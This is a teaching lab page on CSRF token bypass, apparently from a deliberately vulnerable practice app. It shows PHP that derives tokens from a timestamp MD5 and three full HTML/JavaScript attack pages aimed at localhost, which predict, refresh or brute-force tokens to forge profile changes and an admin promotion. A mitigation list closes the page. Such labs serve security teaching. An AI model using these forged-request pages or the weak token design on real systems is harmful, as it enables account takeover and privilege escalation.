Lab 2: CSRF with Token Bypass

Weak CSRF token implementation

Difficulty: Medium

Lab Overview

This lab demonstrates CSRF vulnerabilities where weak CSRF token implementation can be bypassed. The application uses predictable tokens and weak validation mechanisms that can be exploited by attackers.

Objective: Bypass CSRF protection by exploiting weak token generation and validation mechanisms.

Vulnerable Code 
// Vulnerable: Weak CSRF token generation
function generate_weak_token() {
    return md5(time() . 'weak_secret');
}

// Vulnerable: Predictable token validation
if ($token === $csrf_token) {
    // Process request
    $_SESSION['user_profile'] = $new_data;
}

// Vulnerable: Token refresh endpoint
if (isset($_GET['refresh_token'])) {
    $_SESSION['csrf_token'] = generate_weak_token();
    // Token can be predicted by attacker
}
CSRF Protection Status
Current CSRF Token

Token: 564de53ba30aa4504bc72a57fd66f618

Generated: 2026-04-28 06:16:28

Weakness: Predictable MD5 hash based on timestamp

Current Profile

Username: victim_user

Email: victim@example.com

Role: user

Balance: $1,000.00

Profile Update (Protected)
Admin Actions (Protected)
Vulnerability Details
  • Type: CSRF Token Bypass
  • Severity: High
  • Method: POST
  • Issue: Weak CSRF token generation and validation
Bypass Techniques
  • Token Prediction: Predict tokens based on timestamp
  • Token Refresh: Use refresh endpoint to get new token
  • Token Reuse: Reuse tokens from other sessions
  • Token Brute Force: Brute force weak token space
CSRF Bypass Techniques

Use these techniques to bypass CSRF protection:

1. Token Prediction Attack:
<html> <body> <h1>Token Prediction Attack</h1> <script> // Predict token based on current timestamp var timestamp = Math.floor(Date.now() / 1000); var predictedToken = md5(timestamp + 'weak_secret'); // Create form with predicted token var form = document.createElement('form'); form.method = 'POST'; form.action = 'http://localhost/test/csrf/2.php'; var inputs = [ {name: 'update_profile', value: '1'}, {name: 'csrf_token', value: predictedToken}, {name: 'username', value: 'hacked_user'}, {name: 'email', value: 'hacker@evil.com'} ]; inputs.forEach(function(input) { var inputElement = document.createElement('input'); inputElement.type = 'hidden'; inputElement.name = input.name; inputElement.value = input.value; form.appendChild(inputElement); }); document.body.appendChild(form); form.submit(); </script> </body> </html>
2. Token Refresh Attack:
<html> <body> <h1>Token Refresh Attack</h1> <script> // First, refresh the token fetch('http://localhost/test/csrf/2.php?refresh_token=1') .then(response => response.text()) .then(data => { // Extract token from response (if visible) var tokenMatch = data.match(/csrf_token.*?value="([^"]+)"/); if (tokenMatch) { var token = tokenMatch[1]; // Now use the token for CSRF attack var form = document.createElement('form'); form.method = 'POST'; form.action = 'http://localhost/test/csrf/2.php'; var inputs = [ {name: 'admin_action', value: '1'}, {name: 'csrf_token', value: token}, {name: 'action', value: 'promote_user'} ]; inputs.forEach(function(input) { var inputElement = document.createElement('input'); inputElement.type = 'hidden'; inputElement.name = input.name; inputElement.value = input.value; form.appendChild(inputElement); }); document.body.appendChild(form); form.submit(); } }); </script> </body> </html>
3. Token Brute Force Attack:
<html> <body> <h1>Token Brute Force Attack</h1> <script> // Brute force weak token space function bruteForceToken() { var timestamp = Math.floor(Date.now() / 1000); // Try tokens around current timestamp for (var i = -10; i <= 10; i++) { var testTimestamp = timestamp + i; var testToken = md5(testTimestamp + 'weak_secret'); // Test token with a request fetch('http://localhost/test/csrf/2.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'update_profile=1&csrf_token=' + testToken + '&username=hacked_user' }).then(response => { if (response.ok) { console.log('Token found:', testToken); } }); } } bruteForceToken(); </script> </body> </html>
Real-World Attack Scenarios
Mitigation Strategies
  • Use cryptographically secure random tokens
  • Implement proper token validation and expiration
  • Use SameSite cookie attributes
  • Implement double-submit cookie pattern
  • Use proper session management and timeout
  • Regular security testing and vulnerability assessments
  • Monitor for unusual request patterns and anomalies